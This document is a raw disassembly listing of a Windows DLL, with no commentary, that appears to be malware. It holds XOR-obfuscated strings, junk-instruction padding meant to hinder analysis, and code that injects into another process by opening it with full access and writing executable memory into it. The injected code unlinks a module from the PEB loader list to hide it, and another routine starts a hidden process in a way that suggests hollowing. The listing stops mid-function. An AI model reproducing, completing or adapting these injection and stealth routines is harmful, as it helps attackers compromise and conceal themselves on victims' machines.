mov ebp, esp
xor eax, eax
push ebp
push offset loc_10001FD1
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_1000867C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10001FD8
loc_10001FD0: ; CODE XREF: CODE:10001FD6�j
retn
; ---------------------------------------------------------------------------
loc_10001FD1: ; DATA XREF: CODE:10001FB2�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10001FD0
; ---------------------------------------------------------------------------
loc_10001FD8: ; CODE XREF: CODE:loc_10001FD0�j
; DATA XREF: CODE:10001FCB�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
sub ds:dword_1000867C, 1
retn
; =============== S U B R O U T I N E =======================================
sub_10001FE4 proc near ; CODE XREF: sub_100021E8+58�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebp
push edi
push esi
push ebx
push ecx
push edx
sub esp, 8
mov ebx, esp
cld
mov esi, [ebx+24h]
mov edi, [ebx+2Ch]
mov eax, edi
mov edx, [ebx+30h]
add eax, [edx]
jb loc_100021A8
mov [ebx], eax
mov eax, esi
add eax, [ebx+28h]
jb loc_100021A8
mov [ebx+4], eax
or ebp, 0FFFFFFFFh
xor ecx, ecx
jmp short loc_10002043
; ---------------------------------------------------------------------------
db 0Ah dup(90h)
; ---------------------------------------------------------------------------
loc_10002024: ; CODE XREF: sub_10001FE4+5D�j
; sub_10001FE4+6E�j
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
cmp edi, [esp+20h+var_20]
jnb loc_1000219A
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_1000203D: ; CODE XREF: sub_10001FE4+186�j
add bl, bl
jnb short loc_10002054
jnz short loc_10002024
loc_10002043: ; CODE XREF: sub_10001FE4+34�j
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
jb short loc_10002024
loc_10002054: ; CODE XREF: sub_10001FE4+5B�j
mov eax, 1
loc_10002059: ; CODE XREF: sub_10001FE4+C3�j
add bl, bl
jnz short loc_1000206C
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
loc_1000206C: ; CODE XREF: sub_10001FE4+77�j
adc eax, eax
js loc_100021A1
add bl, bl
jnb short loc_1000208B
jnz short loc_100020A9
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
jb short loc_100020A9
loc_1000208B: ; CODE XREF: sub_10001FE4+92�j
dec eax
add bl, bl
jnz short loc_1000209F
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
loc_1000209F: ; CODE XREF: sub_10001FE4+AA�j
adc eax, eax
js loc_100021A1
jmp short loc_10002059
; ---------------------------------------------------------------------------
loc_100020A9: ; CODE XREF: sub_10001FE4+94�j
; sub_10001FE4+A5�j
cmp eax, 1000002h
ja loc_100021A1
sub eax, 3
jb short loc_100020F5
shl eax, 8
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz loc_1000216F
jns loc_100021A1
sar eax, 1
mov ebp, eax
jnb short loc_10002106
loc_100020DE: ; CODE XREF: sub_10001FE4:loc_10002104�j
; sub_10001FE4:loc_10002116�j
add bl, bl
jnz short loc_100020F1
cmp esi, [esp+20h+var_1C]
jnb loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
loc_100020F1: ; CODE XREF: sub_10001FE4+FC�j
adc ecx, ecx
jmp short loc_10002141
; ---------------------------------------------------------------------------
loc_100020F5: ; CODE XREF: sub_10001FE4+D3�j
add bl, bl
jnz short loc_10002104
cmp esi, [esp+20h+var_1C]
jnb short loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
loc_10002104: ; CODE XREF: sub_10001FE4+113�j
jb short loc_100020DE
loc_10002106: ; CODE XREF: sub_10001FE4+F8�j
inc ecx
add bl, bl
jnz short loc_10002116
cmp esi, [esp+20h+var_1C]
jnb short loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
loc_10002116: ; CODE XREF: sub_10001FE4+125�j
jb short loc_100020DE
loc_10002118: ; CODE XREF: sub_10001FE4+149�j
; sub_10001FE4+158�j
add bl, bl
jnz short loc_10002127
cmp esi, [esp+20h+var_1C]
jnb short loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
loc_10002127: ; CODE XREF: sub_10001FE4+136�j
adc ecx, ecx
js short loc_1000219A
add bl, bl
jnb short loc_10002118
jnz short loc_1000213E
cmp esi, [esp+20h+var_1C]
jnb short loc_1000217A
mov bl, [esi]
inc esi
adc bl, bl
jnb short loc_10002118
loc_1000213E: ; CODE XREF: sub_10001FE4+14B�j
add ecx, 2
loc_10002141: ; CODE XREF: sub_10001FE4+10F�j
cmp ebp, 0FFFFFB00h
adc ecx, 2
mov edx, edi
add edx, ecx
jb short loc_1000219A
cmp edx, [esp+20h+var_20]
ja short loc_1000219A
mov edx, edi
add edx, ebp
jnb short loc_100021A1
cmp edx, [esp+20h+arg_8]
jb short loc_100021A1
loc_10002161: ; CODE XREF: sub_10001FE4+184�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_10002161
jmp loc_1000203D
; ---------------------------------------------------------------------------
loc_1000216F: ; CODE XREF: sub_10001FE4+E8�j
cmp edi, [esp+20h+var_20]
ja short loc_1000219A
cmp esi, [esp+20h+var_1C]
jbe short loc_10002181
loc_1000217A: ; CODE XREF: sub_10001FE4+44�j
; sub_10001FE4+63�j ...
mov eax, 0FFFFFF37h
jmp short loc_10002186
; ---------------------------------------------------------------------------
loc_10002181: ; CODE XREF: sub_10001FE4+194�j
jz short loc_10002186
dec eax
mov al, 33h
loc_10002186: ; CODE XREF: sub_10001FE4+19B�j
; sub_10001FE4:loc_10002181�j ...
sub edi, [esp+20h+arg_8]
mov edx, [esp+20h+arg_C]
mov [edx], edi
add esp, 8
pop edx
pop ecx
pop ebx
pop esi
pop edi
pop ebp
retn
; ---------------------------------------------------------------------------
loc_1000219A: ; CODE XREF: sub_10001FE4+4D�j
; sub_10001FE4+145�j ...
mov eax, 0FFFFFF36h
jmp short loc_10002186
; ---------------------------------------------------------------------------
loc_100021A1: ; CODE XREF: sub_10001FE4+8A�j
; sub_10001FE4+BD�j ...
mov eax, 0FFFFFF35h
jmp short loc_10002186
; ---------------------------------------------------------------------------
loc_100021A8: ; CODE XREF: sub_10001FE4+19�j
; sub_10001FE4+26�j
or eax, 0FFFFFFFFh
jmp short loc_10002186
sub_10001FE4 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_100021D5
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10008680
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100021DC
loc_100021D4: ; CODE XREF: CODE:100021DA�j
retn
; ---------------------------------------------------------------------------
loc_100021D5: ; DATA XREF: CODE:100021B6�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100021D4
; ---------------------------------------------------------------------------
loc_100021DC: ; CODE XREF: CODE:loc_100021D4�j
; DATA XREF: CODE:100021CF�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub ds:dword_10008680, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100021E8 proc near ; CODE XREF: CODE:10006986�p
; CODE:10006A27�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_10002274
mov eax, [ebp+var_4]
sub eax, 4
mov eax, [eax]
mov [ebp+var_C], eax
cmp [ebp+var_C], 4
jb short loc_10002274
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_1000224E
mov eax, [ebp+var_8]
mov ecx, [ebp+var_10]
xor edx, edx
call sub_100017C4
push 0
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_8]
mov eax, [eax]
push eax
mov eax, [ebp+var_C]
sub eax, 4
push eax
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_10001FE4
add esp, 14h
test eax, eax
jnz short loc_10002274
jmp short loc_1000227C
; ---------------------------------------------------------------------------
loc_1000224E: ; CODE XREF: sub_100021E8+2F�j
sub [ebp+var_C], 4
mov eax, [ebp+var_8]
mov ecx, [ebp+var_C]
xor edx, edx
call sub_100017C4
mov edx, [ebp+var_8]
mov edx, [edx]
mov eax, [ebp+var_4]
add eax, 4
mov ecx, [ebp+var_C]
call sub_100011D4
jmp short loc_1000227C
; ---------------------------------------------------------------------------
loc_10002274: ; CODE XREF: sub_100021E8+10�j
; sub_100021E8+21�j ...
mov eax, [ebp+var_8]
call sub_100016D8
loc_1000227C: ; CODE XREF: sub_100021E8+64�j
; sub_100021E8+8A�j
mov esp, ebp
pop ebp
retn
sub_100021E8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_100022A5
push dword ptr fs:[eax]
mov fs:[eax], esp
inc ds:dword_10008684
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100022AC
loc_100022A4: ; CODE XREF: CODE:100022AA�j
retn
; ---------------------------------------------------------------------------
loc_100022A5: ; DATA XREF: CODE:10002286�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100022A4
; ---------------------------------------------------------------------------
loc_100022AC: ; CODE XREF: CODE:loc_100022A4�j
; DATA XREF: CODE:1000229F�o
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
sub ds:dword_10008684, 1
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100022B8 proc near ; CODE XREF: sub_100025E0+30�p
; sub_1000292C+4F�p ...
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_100023F3
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
mov eax, [ebp+var_4]
call sub_10001854
test eax, eax
jle short loc_10002332
mov [ebp+var_18], eax
mov [ebp+var_10], 1
loc_100022FA: ; CODE XREF: sub_100022B8+78�j
cmp [ebp+var_14], 100h
jnz short loc_10002309
mov eax, [ebp+var_8]
mov [ebp+var_14], eax
loc_10002309: ; CODE XREF: sub_100022B8+49�j
lea eax, [ebp+var_4]
call sub_10001A24
mov edx, [ebp+var_10]
mov ecx, [ebp+var_4]
mov ebx, [ebp+var_10]
movzx ecx, byte ptr [ecx+ebx-1]
xor ecx, [ebp+var_14]
mov [eax+edx-1], cl
nop
inc [ebp+var_14]
inc [ebp+var_10]
dec [ebp+var_18]
jnz short loc_100022FA
loc_10002332: ; CODE XREF: sub_100022B8+36�j
pusha
rol esi, 9
dec esi
rol ecx, 7Fh
xor esi, eax
nop
xor esi, 0E4h
ror ecx, 25h
inc ebx
sub edi, 7Bh
nop
xor esi, ebx
mov eax, ecx
dec eax
mov esi, eax
add esi, 14h
xor ecx, 29h
nop
mov ecx, 38h
dec eax
mov esi, eax
sub esi, 46h
dec edx
nop
xor ebx, esi
dec ebx
popa
pusha
inc edx
mov ebx, esi
xor edx, 86h
inc edi
mov eax, 18h
inc edi
xor edx, edi
nop
add edi, 46h
mov edx, 30h
sub ecx, 0EEh
ror ebx, 29h
popa
pusha
nop
mov edx, 0F0h
mov edx, 0D4h
inc edx
xor ebx, edx
mov ebx, esi
add ebx, 38h
xor eax, 0CAh
nop
sub edi, 31h
nop
add edi, 15h
mov esi, eax
mov esi, ebx
add edi, 12h
mov edx, 27h
rol ecx, 0B9h
ror eax, 0CEh
xor esi, 0Fh
add edx, 0A1h
mov ecx, 8Bh
popa
mov eax, [ebp+var_C]
mov edx, [ebp+var_4]
call sub_1000172C
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100023FA
loc_100023EA: ; CODE XREF: sub_100022B8+140�j
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_100023F3: ; DATA XREF: sub_100022B8+1B�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100023EA
; ---------------------------------------------------------------------------
loc_100023FA: ; CODE XREF: sub_100022B8+13A�j
; DATA XREF: sub_100022B8+12D�o
pop ebx
mov esp, ebp
pop ebp
retn
sub_100022B8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002400 proc near ; CODE XREF: sub_10002484+2F�p
; sub_10002484+40�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
mov [ebp+var_5], dl
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_10002476
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_C], 0FFFFFFFFh
mov eax, [ebp+var_4]
call sub_10001854
mov [ebp+var_10], eax
cmp [ebp+var_4], 0
jz short loc_10002460
cmp [ebp+var_10], 0
jz short loc_10002460
jmp short loc_1000244B
; ---------------------------------------------------------------------------
loc_10002442: ; CODE XREF: sub_10002400+58�j
cmp [ebp+var_10], 0
jl short loc_1000245A
dec [ebp+var_10]
loc_1000244B: ; CODE XREF: sub_10002400+40�j
mov eax, [ebp+var_4]
mov edx, [ebp+var_10]
mov al, [eax+edx-1]
cmp al, [ebp+var_5]
jnz short loc_10002442
loc_1000245A: ; CODE XREF: sub_10002400+46�j
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
loc_10002460: ; CODE XREF: sub_10002400+38�j
; sub_10002400+3E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_1000247D
loc_1000246D: ; CODE XREF: sub_10002400+7B�j
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_10002476: ; DATA XREF: sub_10002400+17�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_1000246D
; ---------------------------------------------------------------------------
loc_1000247D: ; CODE XREF: sub_10002400+75�j
; DATA XREF: sub_10002400+68�o
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_10002400 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002484 proc near ; CODE XREF: sub_100027F8+49�p
; sub_100027F8+60�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_100024F4
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_8]
call sub_100016D8
mov dl, 5Ch
mov eax, [ebp+var_4]
call sub_10002400
inc eax
jz short loc_100024DE
mov eax, [ebp+var_8]
push eax
mov dl, 5Ch
mov eax, [ebp+var_4]
call sub_10002400
inc eax
push eax
mov eax, [ebp+var_4]
call sub_10001854
mov ecx, eax
mov eax, [ebp+var_4]
pop edx
call sub_10001A2C
loc_100024DE: ; CODE XREF: sub_10002484+35�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100024FB
loc_100024EB: ; CODE XREF: sub_10002484+75�j
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_100024F4: ; DATA XREF: sub_10002484+17�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100024EB
; ---------------------------------------------------------------------------
loc_100024FB: ; CODE XREF: sub_10002484+6F�j
; DATA XREF: sub_10002484+62�o
pop ecx
pop ecx
pop ebp
retn
sub_10002484 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10002500 proc near ; DATA XREF: sub_100025E0+157�o
; sub_100025E0+176�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
push esi
push edi
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov eax, large fs:18h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov eax, [eax+30h]
mov edx, [ebp+var_8]
mov [edx+18h], eax
mov eax, [ebp+var_8]
mov eax, [eax+18h]
mov eax, [eax+0Ch]
mov edx, [ebp+var_8]
mov esi, eax
lea edi, [edx+1Ch]
mov ecx, 9
rep movsd
mov eax, [ebp+var_8]
xor edx, edx
mov [eax+14h], edx
mov eax, [ebp+var_8]
mov eax, [eax+4]
push eax
mov eax, [ebp+var_8]
call dword ptr [eax]
mov edx, [ebp+var_8]
mov [edx+10h], eax
loc_10002556: ; CODE XREF: sub_10002500+D0�j
mov eax, [ebp+var_8]
cmp dword ptr [eax+14h], 104h
jge short loc_100025D2
mov eax, [ebp+var_8]
inc dword ptr [eax+14h]
mov eax, [ebp+var_8]
mov eax, [eax+28h]
mov eax, [eax+18h]
mov edx, [ebp+var_8]
cmp eax, [edx+10h]
jnz short loc_100025C2
mov eax, [ebp+var_8]
cmp dword ptr [eax+0Ch], 0
jnz short loc_100025AB
mov eax, [ebp+var_8]
mov eax, [eax+28h]
mov eax, [eax]
mov edx, [ebp+var_8]
mov edx, [edx+28h]
mov edx, [edx+4]
mov [edx], eax
mov eax, [ebp+var_8]
mov eax, [eax+28h]
mov eax, [eax+4]
mov edx, [ebp+var_8]
mov edx, [edx+28h]
mov edx, [edx]
mov [edx+4], eax
jmp short loc_100025D2
; ---------------------------------------------------------------------------
loc_100025AB: ; CODE XREF: sub_10002500+80�j
mov eax, [ebp+var_8]
mov eax, [eax+28h]
mov edx, [ebp+var_8]
mov ecx, [edx+8]
mov [eax+24h], ecx
mov ecx, [edx+0Ch]
mov [eax+28h], ecx
jmp short loc_100025D2
; ---------------------------------------------------------------------------
loc_100025C2: ; CODE XREF: sub_10002500+77�j
mov eax, [ebp+var_8]
mov eax, [eax+28h]
mov eax, [eax]
mov edx, [ebp+var_8]
mov [edx+28h], eax
jmp short loc_10002556
; ---------------------------------------------------------------------------
loc_100025D2: ; CODE XREF: sub_10002500+60�j
; sub_10002500+A9�j ...
pop edi
pop esi
pop ecx
pop ecx
pop ebp
retn 4
sub_10002500 endp
; ---------------------------------------------------------------------------
align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100025E0 proc near ; CODE XREF: sub_100027F8+B0�p
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = dword ptr -64h
var_30 = dword ptr -30h
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
lpString = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFF8Ch
push ebx
xor ebx, ebx
mov [ebp+var_74], ebx
mov [ebp+lpString], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_100027A7
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_74]
mov edx, 20200437h
mov eax, offset dword_100027C0
call sub_100022B8
mov eax, [ebp+var_74]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_30], eax
mov [ebp+var_D], 0
mov eax, [ebp+lpString]
mov [ebp+var_28], eax
mov eax, [ebp+lpString]
push eax ; lpString
call lstrlenW ; lstrlenW
add eax, eax
mov [ebp+var_2C], ax
mov [ebp+var_2A], 208h
push offset aGetmodulehandl ; "GetModuleHandleW"
push offset ModuleName ; "kernel32.dll"
call GetModuleHandleA_0
push eax
call ds:dword_100087F8
mov [ebp+var_70], eax
push 40h
push 3000h
movzx eax, [ebp+var_2C]
push eax
push 0
mov eax, [ebp+var_4]
push eax
call ds:dword_10008814
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push eax
movzx eax, [ebp+var_2C]
push eax
mov eax, [ebp+var_28]
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_4]
push eax
call ds:dword_10008808
mov eax, [ebp+var_1C]
mov [ebp+var_64], eax
mov ax, [ebp+var_2C]
mov [ebp+var_68], ax
mov ax, [ebp+var_2A]
mov [ebp+var_66], ax
push 40h
push 3000h
mov eax, [ebp+var_8]
push eax ; lpString
call lstrlenW ; lstrlenW
add eax, eax
push eax
push 0
mov eax, [ebp+var_4]
push eax
call ds:dword_10008814
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push eax
mov eax, [ebp+var_8]
push eax ; lpString
call lstrlenW ; lstrlenW
add eax, eax
push eax
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+var_1C]
push eax
mov eax, [ebp+var_4]
push eax
call ds:dword_10008808
mov eax, [ebp+var_1C]
mov [ebp+var_6C], eax
push 40h
push 3000h
push 40h
push 0
mov eax, [ebp+var_4]
push eax
call ds:dword_10008814
mov [ebp+var_14], eax
lea eax, [ebp+var_20]
push eax
push 40h
lea eax, [ebp+var_70]
push eax
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_4]
push eax
call ds:dword_10008808
push 40h
push 3000h
mov eax, offset nullsub_2
sub eax, offset sub_10002500
push eax
push 0
mov eax, [ebp+var_4]
push eax
call ds:dword_10008814
mov [ebp+var_18], eax
lea eax, [ebp+var_20]
push eax
mov eax, offset nullsub_2
sub eax, offset sub_10002500
push eax
push offset sub_10002500
mov eax, [ebp+var_18]
push eax
mov eax, [ebp+var_4]
push eax
call ds:dword_10008808
lea eax, [ebp+var_24]
push eax
push 0
mov eax, [ebp+var_14]
push eax
mov eax, [ebp+var_18]
push eax
push 0
push 0
mov eax, [ebp+var_4]
push eax
call [ebp+var_30]
test eax, eax
jbe short loc_10002791
mov [ebp+var_D], 1
loc_10002791: ; CODE XREF: sub_100025E0+1AB�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100027AE
loc_1000279E: ; CODE XREF: sub_100025E0+1CC�j
lea eax, [ebp+var_74]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_100027A7: ; DATA XREF: sub_100025E0+18�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_1000279E
; ---------------------------------------------------------------------------
loc_100027AE: ; CODE XREF: sub_100025E0+1C6�j
; DATA XREF: sub_100025E0+1B9�o
mov al, [ebp+var_D]
pop ebx
mov esp, ebp
pop ebp
retn
sub_100025E0 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 12h
dword_100027C0 dd 5B5C4A74h, 5B6F594Fh, 27352F52h, 23372C17h, 2C26h
; DATA XREF: sub_100025E0+2B�o
aGetmodulehandl db 'GetModuleHandleW',0 ; DATA XREF: sub_100025E0+6C�o
align 4
; char ModuleName[]
ModuleName db 'kernel32.dll',0 ; DATA XREF: sub_100025E0+71�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100027F8 proc near ; CODE XREF: sub_1000292C+3C1�p
; sub_100031E0+454�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
mov ecx, 4
loc_10002800: ; CODE XREF: sub_100027F8+D�j
push 0
push 0
dec ecx
jnz short loc_10002800
push ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_100028DD
push dword ptr fs:[eax]
mov fs:[eax], esp
lea edx, [ebp+var_18]
xor eax, eax
call sub_10001380
mov edx, [ebp+var_18]
mov eax, [ebp+var_4]
call sub_10001924
jz short loc_100028AD
lea edx, [ebp+var_1C]
mov eax, [ebp+var_4]
call sub_10002484
cmp [ebp+var_1C], 0
jz short loc_100028AD
cmp [ebp+var_4], 0
jz short loc_100028AD
lea edx, [ebp+var_20]
mov eax, [ebp+var_4]
call sub_10002484
mov edx, [ebp+var_20]
lea eax, [ebp+var_10]
call sub_10001C34
lea edx, [ebp+var_24]
xor eax, eax
call sub_10001380
mov edx, [ebp+var_24]
lea eax, [ebp+var_C]
call sub_10001C34
mov eax, [ebp+var_8]
push eax
push 0
push 1F0FFFh
call ds:dword_10008820
mov [ebp+var_14], eax
mov eax, [ebp+var_C]
call sub_10001C44
push eax
mov eax, [ebp+var_10]
call sub_10001C44
mov edx, eax
mov eax, [ebp+var_14]
pop ecx
call sub_100025E0
loc_100028AD: ; CODE XREF: sub_100027F8+41�j
; sub_100027F8+52�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_100028E4
loc_100028BA: ; CODE XREF: sub_100027F8+EA�j
lea eax, [ebp+var_24]
mov edx, 4
call sub_100016FC
lea eax, [ebp+var_10]
mov edx, 2
call sub_10001B60
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_100028DD: ; DATA XREF: sub_100027F8+21�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100028BA
; ---------------------------------------------------------------------------
loc_100028E4: ; CODE XREF: sub_100027F8+E4�j
; DATA XREF: sub_100027F8+BD�o
mov esp, ebp
pop ebp
retn
sub_100027F8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100028E8 proc near ; CODE XREF: sub_1000292C+2A1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, 18h
mov edx, [ebp+var_4]
movzx edx, word ptr [edx+14h]
add eax, edx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
pop ecx
pop ecx
pop ebp
retn
sub_100028E8 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000290C proc near ; CODE XREF: sub_1000292C+317�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shr eax, 1Dh
mov eax, ds:dword_10007084[eax*4]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
pop ecx
pop ecx
pop ebp
retn
sub_1000290C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000292C proc near ; CODE XREF: CODE:10006ABB�p
; CODE:10006AF3�p
var_164 = dword ptr -164h
var_160 = dword ptr -160h
var_15C = dword ptr -15Ch
var_B8 = dword ptr -0B8h
var_AC = dword ptr -0ACh
var_90 = dword ptr -90h
var_64 = dword ptr -64h
var_60 = word ptr -60h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_2D = byte ptr -2Dh
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFE9Ch
push ebx
xor ebx, ebx
mov [ebp+var_164], ebx
mov [ebp+var_160], ebx
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
call sub_100019C8
mov eax, [ebp+var_C]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_10002D35
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_160]
mov edx, 20200437h
mov eax, offset dword_10002D50
call sub_100022B8
mov eax, [ebp+var_160]
call sub_100019D8
push eax
mov eax, ds:dword_100087E4
push eax
call ds:dword_100087F8
mov [ebp+var_34], eax
lea ecx, [ebp+var_164]
mov edx, 20200437h
mov eax, offset dword_10002D70
call sub_100022B8
mov eax, [ebp+var_164]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov [ebp+var_38], eax
mov [ebp+var_D], 0
lea eax, [ebp+var_4C]
xor ecx, ecx
mov edx, 10h
call sub_10001440
lea eax, [ebp+var_90]
xor ecx, ecx
mov edx, 44h
call sub_10001440
mov [ebp+var_90], 44h
cmp [ebp+arg_0], 1
jnz short loc_10002A0D
mov [ebp+var_64], 1
mov [ebp+var_60], 0
loc_10002A0D: ; CODE XREF: sub_1000292C+D2�j
lea eax, [ebp+var_4C]
push eax
lea eax, [ebp+var_90]
